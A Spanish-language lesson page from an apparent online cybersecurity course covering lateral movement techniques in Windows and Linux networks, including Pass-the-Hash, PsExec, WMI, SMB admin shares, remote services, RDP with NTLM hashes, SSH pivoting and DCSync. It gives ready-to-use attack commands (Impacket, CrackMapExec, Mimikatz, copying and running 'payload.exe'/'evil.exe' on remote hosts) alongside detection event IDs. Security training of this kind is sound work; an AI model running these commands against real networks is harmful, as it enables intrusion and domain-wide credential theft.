Técnicas de movimiento lateral
Muévase por las redes mediante WMI, PsExec, WinRM y recursos compartidos SMB sin activar alertas.
Técnicas de movimiento lateral es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 3 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué es el movimiento lateral?
El movimiento lateral es el conjunto de técnicas que utilizan los atacantes para desplazarse progresivamente por una red después del compromiso inicial: pivotan desde el primer punto de apoyo hacia objetivos de mayor valor, como controladores de dominio, bases de datos y sistemas de copias de seguridad.
Pass-the-Hash (PtH)
La autenticación NTLM de Windows permite utilizar directamente el hash de la contraseña en lugar de la contraseña en texto plano. Un atacante que haya extraído hashes NTLM puede autenticarse en otros sistemas sin descifrarlos.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHPass-the-Ticket (PtT)
Los tickets de Kerberos (TGT o TGS) pueden extraerse de la memoria e importarse para autenticarse como el titular del ticket. Los ataques Golden Ticket falsifican TGT mediante el hash de KRBTGT y proporcionan acceso ilimitado a Kerberos en el dominio.
Ejecución remota de código: PSExec
psexec (Sysinternals e Impacket) ejecuta comandos en hosts Windows remotos mediante SMB y recursos compartidos administrativos. Requiere credenciales de administrador. Crea un binario de servicio en el objetivo.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecMovimiento lateral mediante WMI
Windows Management Instrumentation permite ejecutar código de forma remota sin crear archivos que muchas herramientas puedan detectar:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB y recursos compartidos administrativos
Los recursos compartidos administrativos de Windows (C$, ADMIN$, IPC$) permiten el movimiento lateral con credenciales de administrador:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Servicios remotos: sc y at
Cree servicios o tareas programadas en sistemas remotos:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP y sesiones interactivas
RDP (Remote Desktop Protocol, puerto 3389) proporciona acceso interactivo completo. Los atacantes utilizan RDP con credenciales robadas. Defensa: restrinja RDP a servidores de salto, exija NLA y registre todas las sesiones.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH como movimiento lateral
En entornos Linux, SSH con claves o credenciales robadas permite desplazarse lateralmente. El abuso del reenvío de agentes permite pivotar a través de hosts comprometidos. Los túneles SSH reenvían puertos para alcanzar sistemas que, de otro modo, serían inaccesibles.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostReplicación de Active Directory (DCSync)
DCSync abusa de la replicación de AD para extraer hashes de contraseñas directamente del DC sin ejecutar código en él; requiere el privilegio DS-Replication-Get-Changes-All:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtDetección del movimiento lateral
Indicadores de detección:
- Evento 4624 (inicio de sesión) con inicios de sesión de tipo 3 (red) inusuales
- Creación de servicios en hosts remotos (evento 7045)
- Conexiones SMB entre estaciones de trabajo
- Creación de procesos mediante WMI en hosts remotos
- Comportamiento anómalo de las cuentas (un usuario inicia sesión desde varias máquinas)
Comprobación rápida: movimiento lateral
¿Qué técnica permite a un atacante autenticarse en sistemas Windows utilizando un hash NTLM capturado sin descifrarlo?
Resumen de la lección
El movimiento lateral utiliza credenciales y protocolos comprometidos para propagarse por la red. Técnicas clave: Pass-the-Hash (reutilización del hash NTLM), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB para la ejecución remota y DCSync para extraer credenciales del dominio. Detección: inicios de sesión de red inusuales (evento 4624), creación de servicios remotos (evento 7045) y tráfico SMB entre estaciones de trabajo.
Preguntas frecuentes
¿La lección «Técnicas de movimiento lateral» es gratis?
Sí — el texto completo de «Técnicas de movimiento lateral» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Técnicas de movimiento lateral»?
Muévase por las redes mediante WMI, PsExec, WinRM y recursos compartidos SMB sin activar alertas. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cyber Security Academy?
No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 3 de 4.
¿Cuánto tiempo toma la lección «Técnicas de movimiento lateral»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?
Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Frameworks de C2: Cobalt Strike y Sliver
- Binarios Living-Off-the-Land (LOLBins)
- Técnicas de movimiento lateral
- Redacción de informes de Red Team